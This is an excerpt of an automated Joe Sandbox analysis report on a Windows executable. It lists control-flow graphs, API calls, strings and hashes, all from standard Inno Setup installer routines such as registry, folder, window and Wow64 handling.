                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                    • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                    • API String ID: 2230631259-2623177817
                                                                                    • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                    • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                                    • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                    • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1594 472708-47273b 1595 472e26-472e5a call 46d4ec call 403400 * 2 call 403420 1594->1595 1596 472741-472745 1594->1596 1598 47274c-472789 call 40b44c call 4780d8 1596->1598 1607 47278f-4727ce call 47c6f0 call 477d4c call 47ad88 * 2 1598->1607 1608 472e1a-472e20 1598->1608 1620 4727d4-4727db 1607->1620 1621 4727d0 1607->1621 1608->1595 1608->1598 1622 4727f4-47280d 1620->1622 1623 4727dd-4727e4 1620->1623 1621->1620 1626 472833-47283a 1622->1626 1627 47280f-472819 call 472538 1622->1627 1624 4727e6-4727eb call 4529a4 1623->1624 1625 4727f0 1623->1625 1624->1625 1625->1622 1630 47283c-472843 1626->1630 1631 472849-472850 1626->1631 1627->1626 1636 47281b-47282e call 403738 call 42dde8 1627->1636 1630->1631 1633 472cf7-472d2d 1630->1633 1634 4728a3-4728c3 call 47255c 1631->1634 1635 472852-472859 1631->1635 1633->1622 1643 472d33-472d3a 1633->1643 1646 472936-47293d 1634->1646 1647 4728c5-4728ea call 403738 call 42dd0c 1634->1647 1635->1634 1639 47285b-47287d call 403738 call 42dd44 1635->1639 1636->1626 1639->1633 1667 472883-47289e call 403738 RegDeleteValueA RegCloseKey 1639->1667 1648 472d6d-472d74 1643->1648 1649 472d3c-472d46 call 472538 1643->1649 1654 472986 1646->1654 1655 47293f-472963 call 403738 call 42dd44 1646->1655 1682 4728ef-4728f3 1647->1682 1652 472da7-472dae 1648->1652 1653 472d76-472d80 call 472538 1648->1653 1649->1648 1666 472d48-472d68 call 459ad4 1649->1666 1663 472db0-472dd6 call 459ad4 1652->1663 1664 472ddb-472de2 1652->1664 1653->1652 1680 472d82-472da2 call 459ad4 1653->1680 1660 47298b-47298d 1654->1660 1655->1660 1697 472965-472968 1655->1697 1660->1633 1668 472993-4729a8 1660->1668 1663->1664 1673 472de4-472e0a call 459ad4 1664->1673 1674 472e0f-472e15 call 477d78 1664->1674 1666->1648 1667->1633 1678 4729bc-4729c3 1668->1678 1679 4729aa-4729b7 call 403738 RegDeleteValueA 1668->1679 1673->1674 1674->1608 1686 472cd9-472cef RegCloseKey 1678->1686 1687 4729c9-4729d0 1678->1687 1679->1678 1680->1652 1690 4728f5-4728f9 1682->1690 1691 47291a-472921 1682->1691 1695 4729d2-4729e6 call 403738 call 42dc8c 1687->1695 1696 4729ec-4729f9 1687->1696 1690->1660 1692 4728ff-472918 call 47255c 1690->1692 1691->1660 1693 472923-472934 call 46dd50 1691->1693 1692->1660 1693->1660 1695->1686 1695->1696 1696->1686 1698 4729ff 1696->1698 1697->1660 1702 47296a-472971 1697->1702 1698->1686 1703 472c26-472c41 call 47ad88 call 430acc 1698->1703 1704 472bc4-472bfd call 47ad88 call 406da0 call 403738 RegSetValueExA 1698->1704 1705 472a22-472a2c 1698->1705 1706 472c8b-472cbd call 403574 call 403738 * 2 RegSetValueExA 1698->1706 1702->1660 1710 472973-472984 call 46dd50 1702->1710 1737 472c43-472c48 call 4529a4 1703->1737 1738 472c4d-472c6d call 403738 RegSetValueExA 1703->1738 1704->1686 1756 472c03-472c0a 1704->1756 1712 472a35-472a3a 1705->1712 1713 472a2e-472a31 1705->1713 1706->1686 1752 472cbf-472cc6 1706->1752 1710->1660 1722 472a41-472a43 1712->1722 1719 472a33 1713->1719 1720 472a3c 1713->1720 1719->1722 1720->1722 1728 472ae0-472af2 call 40385c 1722->1728 1729 472a49-472a5b call 40385c 1722->1729 1747 472af4-472b0b call 403738 call 42dc80 1728->1747 1748 472b0d-472b10 call 403400 1728->1748 1744 472a76-472a79 call 403400 1729->1744 1745 472a5d-472a74 call 403738 call 42dc74 1729->1745 1737->1738 1738->1686 1763 472c6f-472c76 1738->1763 1759 472a7e-472a85 1744->1759 1745->1744 1745->1759 1747->1748 1760 472b15-472b4e call 47ada8 1747->1760 1748->1760 1752->1686 1761 472cc8-472cd4 call 46dd50 1752->1761 1756->1686 1758 472c10-472c21 call 46dd50 1756->1758 1758->1686 1766 472a87-472aa5 call 403738 RegQueryValueExA 1759->1766 1767 472ab6-472adb call 47ada8 1759->1767 1781 472b50-472b60 call 403574 1760->1781 1782 472b6f-472b9b call 403574 call 403738 * 2 RegSetValueExA 1760->1782 1761->1686 1763->1686 1771 472c78-472c89 call 46dd50 1763->1771 1766->1767 1784 472aa7-472aab 1766->1784 1767->1782 1771->1686 1781->1782 1792 472b62-472b6a call 40357c 1781->1792 1782->1686 1797 472ba1-472ba8 1782->1797 1787 472ab3 1784->1787 1788 472aad-472ab1 1784->1788 1787->1767 1788->1767 1788->1787 1792->1782 1797->1686 1798 472bae-472bbf call 46dd50 1797->1798 1798->1686
                                                                                    APIs
                                                                                    • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                                      • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                    • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                                      • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                      • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteErrorLastValue$CloseCreate
                                                                                    • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                                    • API String ID: 2638610037-3092547568
                                                                                    • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                    • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                                    • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                    • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1801 4684c8-468500 call 47ad88 1804 468506-468516 call 4778cc 1801->1804 1805 4686e2-4686fc call 403420 1801->1805 1810 46851b-468560 call 4078fc call 403738 call 42dd44 1804->1810 1816 468565-468567 1810->1816 1817 46856d-468582 1816->1817 1818 4686d8-4686dc 1816->1818 1819 468597-46859e 1817->1819 1820 468584-468592 call 42dc74 1817->1820 1818->1805 1818->1810 1822 4685a0-4685c2 call 42dc74 call 42dc8c 1819->1822 1823 4685cb-4685d2 1819->1823 1820->1819 1822->1823 1842 4685c4 1822->1842 1825 4685d4-4685f9 call 42dc74 * 2 1823->1825 1826 46862b-468632 1823->1826 1845 4685fb-468604 call 478558 1825->1845 1846 468609-46861b call 42dc74 1825->1846 1828 468634-468646 call 42dc74 1826->1828 1829 468678-46867f 1826->1829 1843 468656-468668 call 42dc74 1828->1843 1844 468648-468651 call 478558 1828->1844 1831 468681-4686b5 call 42dc74 * 3 1829->1831 1832 4686ba-4686d0 RegCloseKey 1829->1832 1831->1832 1842->1823 1843->1829 1854 46866a-468673 call 478558 1843->1854 1844->1843 1845->1846 1846->1826 1858 46861d-468626 call 478558 1846->1858 1854->1829 1858->1826
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                                    Strings
                                                                                    • Inno Setup: Deselected Components, xrefs: 0046860C
                                                                                    • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                                    • Inno Setup: Setup Type, xrefs: 004685DA
                                                                                    • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                                    • Inno Setup: Selected Components, xrefs: 004685EA
                                                                                    • Inno Setup: No Icons, xrefs: 004685B3
                                                                                    • %s\%s_is1, xrefs: 00468545
                                                                                    • Inno Setup: Icon Group, xrefs: 004685A6
                                                                                    • Inno Setup: User Info: Name, xrefs: 00468687
                                                                                    • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                                    • Inno Setup: App Path, xrefs: 0046858A
                                                                                    • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                    • API String ID: 47109696-1093091907
                                                                                    • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                    • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                                    • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                    • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2019 47b8dc-47b932 call 42c40c call 4035c0 call 47b558 call 451c38 2028 47b934-47b939 call 4529a4 2019->2028 2029 47b93e-47b94d call 451c38 2019->2029 2028->2029 2033 47b967-47b96d 2029->2033 2034 47b94f-47b955 2029->2034 2037 47b984-47b9ac call 42e2bc * 2 2033->2037 2038 47b96f-47b975 2033->2038 2035 47b977-47b97f call 403494 2034->2035 2036 47b957-47b95d 2034->2036 2035->2037 2036->2033 2041 47b95f-47b965 2036->2041 2045 47b9d3-47b9ed GetProcAddress 2037->2045 2046 47b9ae-47b9ce call 4078fc call 4529a4 2037->2046 2038->2035 2038->2037 2041->2033 2041->2035 2048 47b9ef-47b9f4 call 4529a4 2045->2048 2049 47b9f9-47ba16 call 403400 * 2 2045->2049 2046->2045 2048->2049
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(74600000,SHGetFolderPathA), ref: 0047B9DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                                    • API String ID: 190572456-2632518235
                                                                                    • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                    • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                                    • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                    • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                                    • API String ID: 1375471231-857235331
                                                                                    • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                    • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                                    • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                    • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2220 406334-40634e GetModuleHandleA GetProcAddress 2221 406350 2220->2221 2222 406357-406364 GetProcAddress 2220->2222 2221->2222 2223 406366 2222->2223 2224 40636d-40637a GetProcAddress 2222->2224 2223->2224 2225 406380-406381 2224->2225 2226 40637c-40637e SetProcessDEPPolicy 2224->2226 2226->2225
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                    • API String ID: 3256987805-3653653586
                                                                                    • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                    • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                    • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                    • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2227 423884-42388e 2228 4239b7-4239bb 2227->2228 2229 423894-4238b6 call 41f3d4 GetClassInfoA 2227->2229 2232 4238e7-4238f0 GetSystemMetrics 2229->2232 2233 4238b8-4238cf RegisterClassA 2229->2233 2234 4238f2 2232->2234 2235 4238f5-4238ff GetSystemMetrics 2232->2235 2233->2232 2236 4238d1-4238e2 call 408cc4 call 40311c 2233->2236 2234->2235 2237 423901 2235->2237 2238 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2235->2238 2236->2232 2237->2238 2250 423962-423975 call 424188 SendMessageA 2238->2250 2251 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2238->2251 2250->2251 2251->2228 2252 4239aa-4239b2 DeleteMenu 2251->2252 2252->2228
                                                                                    APIs
                                                                                      • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                    • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                    • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                                    • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                    • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                    • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                    • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                    • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                    • String ID:
                                                                                    • API String ID: 183575631-0
                                                                                    • Opcode ID: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                    • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                                    • Opcode Fuzzy Hash: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                    • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2255 42f3d4-42f3de 2256 42f3e0-42f3e3 call 402d30 2255->2256 2257 42f3e8-42f425 call 402b30 GetActiveWindow GetFocus call 41eeb4 2255->2257 2256->2257 2263 42f437-42f43f 2257->2263 2264 42f427-42f431 RegisterClassA 2257->2264 2265 42f4c6-42f4e2 SetFocus call 403400 2263->2265 2266 42f445-42f476 CreateWindowExA 2263->2266 2264->2263 2266->2265 2267 42f478-42f4bc call 42428c call 403738 CreateWindowExA 2266->2267 2267->2265 2274 42f4be-42f4c1 ShowWindow 2267->2274 2274->2265
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 0042F403
                                                                                    • GetFocus.USER32 ref: 0042F40B
                                                                                    • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                                    • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                    • String ID: TWindowDisabler-Window
                                                                                    • API String ID: 3167913817-1824977358
                                                                                    • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                    • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                                    • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                    • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2275 452850-4528a1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2276 4528a3-4528aa 2275->2276 2277 4528ac-4528ae 2275->2277 2276->2277 2278 4528b0 2276->2278 2279 4528b2-4528e8 call 42e2bc call 42e73c call 403400 2277->2279 2278->2279
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                    • API String ID: 1646373207-2130885113
                                                                                    • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                    • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                                    • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                    • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
                                                                                    APIs
                                                                                    • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
